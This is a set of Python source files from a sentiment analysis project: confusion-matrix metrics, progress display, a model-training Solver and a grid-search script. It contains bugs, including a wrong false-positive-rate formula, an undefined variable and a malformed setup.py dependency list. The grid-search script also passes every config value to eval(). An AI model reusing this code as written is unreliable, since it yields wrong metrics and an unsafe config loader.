def false_positive(matrix):
r"""False positives values from a confusion matrix.
.. math::
FP(M) = \sum_{i=0}^{C-1}{M_i} - \text{Diag}(M)
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
return np.sum(matrix, axis=0) - np.diag(matrix)
def false_negative(matrix):
r"""False negatives values from a confusion matrix.
.. math::
FN(M) = \sum_{j=0}^{C-1}{M_j} - \text{Diag}(M)
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
return np.sum(matrix, axis=1) - np.diag(matrix)
def true_positive_rate(matrix):
r"""True positive rate from a confusion matrix.
.. math::
TPR(M) = \frac{TP(M)}{TP(M) + FN(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = true_positive(matrix)
bottom = true_positive(matrix) + false_negative(matrix)
return np.where(bottom != 0, top / bottom, 0)
def true_negative_rate(matrix):
r"""True negative rate from a confusion matrix.
.. math::
TNR(M) = \frac{TN(M)}{TN(M) + FP(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = true_negative(matrix)
bottom = true_negative(matrix) + false_positive(matrix)
return np.where(bottom != 0, top / bottom, 0)
def positive_predictive_value(matrix):
r"""Positive predictive value from a confusion matrix.
.. math::
PPV(M) = \frac{TP(M)}{TP(M) + FP(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = true_positive(matrix)
bottom = true_positive(matrix) + false_positive(matrix)
return np.where(bottom != 0, top / bottom, 0)
def negative_predictive_value(matrix):
r"""Negative predictive value from a confusion matrix.
.. math::
NPV(M) = \frac{TN(M)}{TN(M) + FN(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = true_negative(matrix)
bottom = true_negative(matrix) + false_negative(matrix)
return np.where(bottom != 0, top / bottom, 0)
def false_positive_rate(matrix):
r"""False positive rate from a confusion matrix.
.. math::
FPR(M) = \frac{FP(M)}{FP(M) + FN(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = false_positive(matrix)
bottom = false_positive(matrix) + false_negative(matrix)
return np.where(bottom != 0, top / bottom, 0)
def false_negative_rate(matrix):
r"""False negative rate from a confusion matrix.
.. math::
FNR(M) = \frac{FN(M)}{FN(M) + TP(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = false_negative(matrix)
bottom = true_positive(matrix) + false_negative(matrix)
return np.where(bottom != 0, top / bottom, 0)
def false_discovery_rate(matrix):
r"""False discovery rate from a confusion matrix.
.. math::
FDR(M) = \frac{FP(M)}{FP(M) + TP(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = false_positive(matrix)
bottom = true_positive(matrix) + false_positive(matrix)
return np.where(bottom != 0, top / bottom, 0)
def accuracy(matrix):
r"""Per class accuracy from a confusion matrix.
.. math::
ACC(M) = \frac{TP(M) + TN(M)}{TP(M) + TN(M) + FP(M) + FN(M)}
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
Returns:
numpy.ndarray
"""
top = true_positive(matrix) + true_negative(matrix)
bottom = true_positive(matrix) + true_negative(matrix) + false_positive(matrix) + false_negative(matrix)
return np.where(bottom != 0, top / bottom, 0)
def flatten_matrix(matrix, axis_label=0, axis_pred=1, map=None):
r"""Flatten a confusion matrix to retrieve its prediction and gold labels.
Args:
matrix (numpy.ndarray): confusion matrix of shape :math:`(C, C)`.
axis_label (int): axis index corresponding to the gold labels.
axis_pred (int): axis index corresponding to the predictions.
map (dict): dictionary to map indices to label.
Returns:
gold labels and predictions.
"""
gold_labels = []
predictions = []
# Change the index order ?
matrix = np.array(matrix)
if axis_label != 0 or axis_pred != 1:
matrix = matrix.T
# Make sure the matrix is a confusion matrix
C = len(matrix)
map = {idx: idx for idx in range(C)} if map is None else map
assert matrix.shape == (C, C), 'the provided matrix is not square'
for i in range(C):
for j in range(C):
gold_labels.extend([map[i]] * int(matrix[i, j]))
predictions.extend([map[j]] * int(matrix[i, j]))
return gold_labels, predictions
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,717 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/display.py | """
This module defines basic function to render a simulation, like progress bar and statistics table.
"""
import numpy as np
import time
def get_time(start_time, end_time):
"""Get ellapsed time in minutes and seconds.
Args:
start_time (float): strarting time
end_time (float): ending time
Returns:
elapsed_mins (float): elapsed time in minutes
elapsed_secs (float): elapsed time in seconds.
"""
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
def progress_bar(current_index, max_index, prefix=None, suffix=None, start_time=None):
"""Display a progress bar and duration.
Args:
current_index (int): current state index (or epoch number).
max_index (int): maximal numbers of state.
prefix (str, optional): prefix of the progress bar. The default is None.
suffix (str, optional): suffix of the progress bar. The default is None.
start_time (float, optional): starting time of the progress bar. If not None, it will display the time
spent from the beginning to the current state. The default is None.
Returns:
None. Display the progress bar in the console.
"""
# Add a prefix to the progress bar
prefix = "" if prefix is None else str(prefix) + " "
# Get the percentage
percentage = current_index * 100 // max_index
loading = "[" + "=" * (percentage // 2) + " " * (50 - percentage // 2) + "]"
progress_display = "\r{0}{1:3d}% | {2}".format(prefix, percentage, loading)
# Add a suffix to the progress bar
progress_display += "" if suffix is None else sep + str(suffix)
# Add a timer
if start_time is not None:
time_min, time_sec = get_time(start_time, time.time())
time_display = f" | Time: {time_min:2d}m {time_sec:2d}s"
progress_display += time_display
# Print the progress bar
# TODO: return a string instead
print(progress_display, end="{}".format("" if current_index < max_index else " | Done !\n"))
def describe_dict(state_dict, key_length=50, show_iter=False, capitalize=False, pad=False, sep_key=', ', sep_val='='):
"""Describe and render a dictionary. Usually, this function is called on a ``Solver`` state dictionary,
and merged with a progress bar.
Args:
state_dict (dict): the dictionary to showcase.
key_length (int): number of letter from a string name to show.
show_iter (bool): if ``True``, show iterable. Note that this may destroy the rendering.
capitalize (bool): if ``True`` will capitalize the keys.
pad (bool): if ``True``, will pad the displayed number up to 4 characters.
sep_key (string): key separator.
sep_val (string): value separator.
Returns:
string: the dictionary to render.
"""
stats_display = ""
use_sep = False
for idx, (key, value) in enumerate(state_dict.items()):
key = str(key).capitalize() if capitalize else str(key)
if isinstance(value, float):
if use_sep:
stats_display += sep_key
value_display = f"{key[:key_length]}{sep_val}{value:.4f}" if pad else f"{key[:key_length]}{sep_val}{value}"
stats_display += f"{value_display}"
use_sep = True
elif isinstance(value, int):
if use_sep:
stats_display += sep_key
value_display = f"{key[:key_length]}{sep_val}{value:4d}" if pad else f"{key[:key_length]}{sep_val}{value}"
stats_display += f"{value_display}"
use_sep = True
elif isinstance(value, bool):
if use_sep:
stats_display += sep_key
stats_display += f"{key[:key_length]}{sep_val}{value}"
use_sep = True
elif isinstance(value, str):
if use_sep:
stats_display += sep_key
stats_display += f"{key[:key_length]}{sep_val}'{value}'"
use_sep = True
elif (isinstance(value, list) or isinstance(value, tuple)) and show_iter:
if use_sep:
stats_display += sep_key
stats_display += f"{key[:key_length]}{sep_val}{value}"
use_sep = True
return stats_display
def stats_dict(state_dict):
r"""Describe statistical information from a dictionary composed of lists.
Args:
state_dict (dict): dictionary were cumulative information are stored.
Returns:
dict
"""
stats = {'mean': {},
'std': {},
'max': {}}
for (key, value) in state_dict.items():
if isinstance(value, list):
if isinstance(value[0], int) or isinstance(value[0], float):
stats['mean'].update({key: float(np.mean(value))})
stats['std'].update({key: float(np.std(value))})
stats['max'].update({key: float(np.max(value))})
# stats['min'].update({key: float(np.min(value))})
# stats['q1/4'].update({key: float(np.quantile(value, 0.25))})
# stats['q2/4'].update({key: float(np.quantile(value, 0.5))})
# stats['q3/4'].update({key: float(np.quantile(value, 0.75))})
return stats
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,718 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/solver.py | r"""
A ``Solver`` is an object used for training, evaluating and testing a model.
The performance is stored in a dictionary, both for training and testing.
In addition, the best model occurred during training is stored,
as well as it's checkpoint to re-load a model at a specific epoch.
Example:
.. code-block:: python
import torch.nn as nn
import torch.optim as optim
model = nn.Sequential(nn.Linear(10, 100), nn.Sigmoid(), nn.Linear(100, 5), nn.ReLU())
optimizer = optim.Adam(model.parameters())
criterion = nn.CrossEntropyLoss(ignore_index = LABEL_PAD_IDX)
solver = BiLSTMSolver(model, optimizer=optimizer, criterion=criterion)
# epochs = number of training loops
# train_iterator = Iterator, DataLoader... Training data
# eval_iterator = Iterator, DataLoader... Eval data
solver.fit(train_iterator, eval_iterator, epochs=epochs)
"""
from abc import ABC, abstractmethod
import torch
import torch.nn as nn
import torch.optim as optim
# Data science
import os
from pathlib import Path
import time
import copy
from sentarget.utils import append2dict, describe_dict, deprecated
@deprecated("Solver instance is deprecated since v0.2. Please use the `Model` class to encapsulate your models instead.")
class Solver(ABC):
r"""Train and evaluate model.
* :attr:`model` (Module): model to optimize or test.
* :attr:`checkpoint` (dict): checkpoint of the best model tested.
* :attr:`criterion` (Loss): loss function.
* :attr:`optimizer` (Optimizer): optimizer for weights and biases.
* :attr:`performance` (dict): dictionary where performances are stored.
* ``'train'`` (dict): training dictionary.
* ``'eval'`` (dict): testing dictionary.
Args:
model (Module): model to optimize or test.
criterion (Loss): loss function.
optimizer (Optimizer): optimizer for weights and biases.
"""
def __init__(self, model, criterion=None, optimizer=None):
# Defaults attributes
self.model = model
self.criterion = nn.CrossEntropyLoss() if criterion is None else criterion
self.optimizer = optim.Adam(model.parameters()) if optimizer is None else optimizer
# Performances
self.best_model = None
self.performance = None
self.checkpoint = None
self.reset()
def reset(self):
"""Reset the performance dictionary."""
self.best_model = None
self.checkpoint = {'epoch': None,
'model_name': None,
'model_state_dict': None,
'optimizer_name': None,
'criterion_name': None,
'optimizer_state_dict': None,
'train': None,
'eval': None
}
self.performance = {
"train": {},
"eval": {}
}
@abstractmethod
def train(self, iterator, *args, **kwargs):
r"""Train one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
Returns:
dict: the performance and metrics of the training session.
"""
raise NotImplementedError
@abstractmethod
def evaluate(self, iterator, *args, **kwargs):
r"""Evaluate one time the model on iterator data.
Args:
iterator (Iterator): iterator containing batch samples of data.
Returns:
dict: the performance and metrics of the training session.
"""
raise NotImplementedError
def _update_checkpoint(self, epoch, results_train=None, results_eval=None):
r"""Update the model's checkpoint. Keep track of its epoch, state, optimizer,
and performances. In addition, it saves the current model in `best_model`.
Args:
epoch (int): epoch at the current training state.
results_train (dict, optional): metrics for the training session at epoch. The default is None.
results_eval (dict, optional): metrics for the evaluation session at epoch. The default is None.
"""
self.best_model = copy.deepcopy(self.model)
self.checkpoint = {'epoch': epoch,
'model_name': self.best_model.__class__.__name__,
'model_state_dict': self.best_model.state_dict(),
'optimizer_name': self.optimizer.__class__.__name__,
'criterion_name': self.criterion.__class__.__name__,
'train': results_train,
'eval': results_eval
}
def save(self, filename=None, dirpath=".", checkpoint=True):
r"""Save the best torch model.
Args:
filename (str, optional): name of the model. The default is "model.pt".
dirpath (str, optional): path to the desired foldre location. The default is ".".
checkpoint (bool, optional): ``True`` to save the model at the best checkpoint during training.
"""
if checkpoint:
# Get the name and other relevant information
model_name = self.checkpoint['model_name']
epoch = self.checkpoint['epoch']
filename = f"model_{model_name}_epoch{epoch}.pt" if filename is None else filename
# Save in the appropriate directory, and create it if it doesn't exists
Path(dirpath).mkdir(parents=True, exist_ok=True)
# Save the best model
path = os.path.join(dirpath, filename)
torch.save(self.best_model, path)
# Save its checkpoint
checkname = f"checkpoint_{filename.split('.')[-2].split('_')[1]}_epoch{epoch}.pt"
checkpath = os.path.join(dirpath, checkname)
torch.save(self.checkpoint, checkpath)
else:
model_name = self.checkpoint['model_name']
filename = f"model_{model_name}.pt" if filename is None else filename
torch.save(self.model, filename)
def get_accuracy(self, y_tilde, y):
r"""Compute accuracy from predicted classes and gold labels.
Args:
y_tilde (Tensor): 1D tensor containing the predicted classes for each predictions
in the batch. This tensor should be computed through `get_predicted_classes(y_hat)` method.
y (Tensor): gold labels. Note that y_tilde an y must have the same shape.
Returns:
float: the mean of correct answers.
Examples::
>>> y = torch.tensor([0, 1, 4, 2, 1, 3, 2, 1, 1, 3])
>>> y_tilde = torch.tensor([0, 1, 2, 2, 1, 3, 2, 4, 4, 3])
>>> solver.get_accuracy(y_tilde, y)
0.7
"""
assert y_tilde.shape == y.shape, "predicted classes and gold labels should have the same shape"
correct = (y_tilde == y).astype(float) # convert into float for division
acc = correct.sum() / len(correct)
return acc
def fit(self, train_iterator, eval_iterator, *args, epochs=10, **kwargs):
r"""Train and evaluate a model X times. During the training, both training
and evaluation results are saved under the `performance` attribute.
Args:
train_iterator (Iterator): iterator containing batch samples of data.
eval_iterator (Iterator): iterator containing batch samples of data.
epochs (int): number of times the model will be trained.
verbose (bool, optional): if ``True`` display a progress bar and metrics at each epoch.
The default is ``True``.
Examples::
>>> solver = MySolver(model, criterion=criterion, optimizer=optimizer)
>>> # Train & eval EPOCHS times
>>> EPOCHS = 10
>>> solver.fit(train_iterator, eval_iterator, epochs=EPOCHS, verbose=True)
Epoch: 1/10
Training: 100% | [==================================================]
Evaluation: 100% | [==================================================]
Stats Training: | Loss: 0.349 | Acc: 84.33% | Prec.: 84.26%
Stats Evaluation: | Loss: 0.627 | Acc: 72.04% | Prec.: 72.22%
>>> # ...
"""
# By default, print a log each epoch
verbose = True if 'verbose' not in {*kwargs} else kwargs['verbose']
# Keep track of the best model
best_eval_accuracy = 0
start_time = time.time()
# Train and evaluate the model epochs times
for epoch in range(epochs):
if verbose:
print("Epoch:\t{0:3d}/{1}".format(epoch + 1, epochs))
# Train and evaluate the model
results_train = self.train(train_iterator, *args, **kwargs)
results_eval = self.evaluate(eval_iterator, *args, **kwargs)
# Update the eval dictionary by adding the results at the
# current epoch
append2dict(self.performance["train"],
results_train)
append2dict(self.performance["eval"],
results_eval)
if verbose:
print("\t Stats Train: | " + describe_dict(results_train))
print("\t Stats Eval: | " + describe_dict(results_eval))
print()
# We copy in memory the best model
if best_eval_accuracy < self.performance["eval"]["accuracy"][-1]:
best_eval_accuracy = self.performance["eval"]["accuracy"][-1]
self._update_checkpoint(epoch + 1, results_train, results_eval)
self.performance['time'] = time.time() - start_time
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,719 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/gridsearch.py | r"""
Run a simple grid search algorithm.
"""
import configparser
from argparse import ArgumentParser
import numpy
import torch
from torchtext import data
from torchtext.vocab import Vectors
import sentarget
from sentarget.datasets import NoReCfine
from sentarget.tuner import Tuner
def gridsearch(options={}, params_hyper={}, params_model={}, params_optim={}, params_loss={}):
"""Run the grid search algorithms on the CONLL dataset provided.
Args:
options (dict): general options.
params_hyper (dict): hyper parameters to tune.
params_model (dict): model's parameters to tune.
params_optim (dict): optimizer parameters to tune.
params_loss (dict): criterion parameters to tune.
"""
# 1/ Load the data
TEXT = data.Field(lower=False, include_lengths=True, batch_first=True)
LABEL = data.Field(batch_first=True, unk_token=None)
FIELDS = [("text", TEXT), ("label", LABEL)]
train_data, eval_data, test_data = NoReCfine.splits(FIELDS)
# 2/ Build the vocab
VOCAB_SIZE = 1_200_000
VECTORS_NAME = params_hyper['vectors_name']
VECTORS_URL = params_hyper['vectors_url']
VECTORS = Vectors(name=VECTORS_NAME, url=VECTORS_URL)
TEXT.build_vocab(train_data, test_data, eval_data,
max_size=VOCAB_SIZE,
vectors=VECTORS,
unk_init=torch.Tensor.normal_)
LABEL.build_vocab(train_data)
# 3/ Load iterators
BATCH_SIZE = params_hyper['batch_size']
device = torch.device('cpu')
train_iterator, eval_iterator, test_iterator = data.BucketIterator.splits((train_data, eval_data, test_data),
batch_size=BATCH_SIZE,
sort_within_batch=True,
device=device)
# Initialize the embedding layer
if params_hyper['use_pretrained_embeddings']:
params_model['embeddings'] = TEXT.vocab.vectors
# 4/ Grid Search
tuner = Tuner(params_hyper=params_hyper,
params_model=params_model,
params_loss=params_loss,
params_optim=params_optim,
options=options)
# Search
tuner.fit(train_iterator, eval_iterator)
tuner.save(dirsaves=options['dirsaves'])
if __name__ == "__main__":
# As there are a lot of customizable parameters (the grid search run on all module's parameters)
# It is more readable to separate the configuration from the code.
# The configuration file is a .ini format,
# but you can create your own custom functions depending on the grid search algorithm that you need.
parser = ArgumentParser()
parser.add_argument('-c', '--conf', help="Path to the config.ini file to use.", action='store',
type=str, default='gridsearch.ini')
args = parser.parse_args()
# Read the configuration file
config = configparser.ConfigParser()
config.read(args.conf)
options = {key: eval(value) for (key, value) in dict(config.items('Options')).items()}
params_hyper = {key: eval(value) for (key, value) in dict(config.items('Hyper')).items()}
params_model = {key: eval(value) for (key, value) in dict(config.items('Model')).items()}
params_loss = {key: eval(value) for (key, value) in dict(config.items('Criterion')).items()}
params_optim = {key: eval(value) for (key, value) in dict(config.items('Optimizer')).items()}
# Run the gridsearch
gridsearch(
params_hyper=params_hyper,
params_model=params_model,
params_loss=params_loss,
params_optim=params_optim,
options=options
)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,720 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/__init__.py | from sentarget.nn import models
from .solver import Solver
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,721 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /setup.py | """
Setup for docs and PyPi.
"""
from setuptools import setup, find_packages
def readme_data():
"""Read the README file."""
with open("README.md", "r") as fh:
long_description = fh.read()
return long_description
find_packages()
setup(name='sentarget',
version='0.2',
description='Targeted Sentiment Analysis',
long_description=readme_data(),
long_description_content_type="text/markdown",
url='https://github.com/arthurdjn/sentarget',
author='Arthur Dujardin',
author_email='arthur.dujardin@ensg.eu',
license='Apache License-2.0',
install_requires=['torch', 'torchtext', 'numpy', 'pandas', 'pickle', 'json', 'sklearn', 'tqdm', 'time', 'scipy'
'seaborn', 'seaborn', 'requests'],
packages=find_packages(),
zip_safe=False,
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Stable',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Natural Language Processing and Sentiment Analysis',
# Pick your license as you wish (should match "license" above)
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3',
]
)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,722 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/__init__.py | from .norecfine import NoReCfine
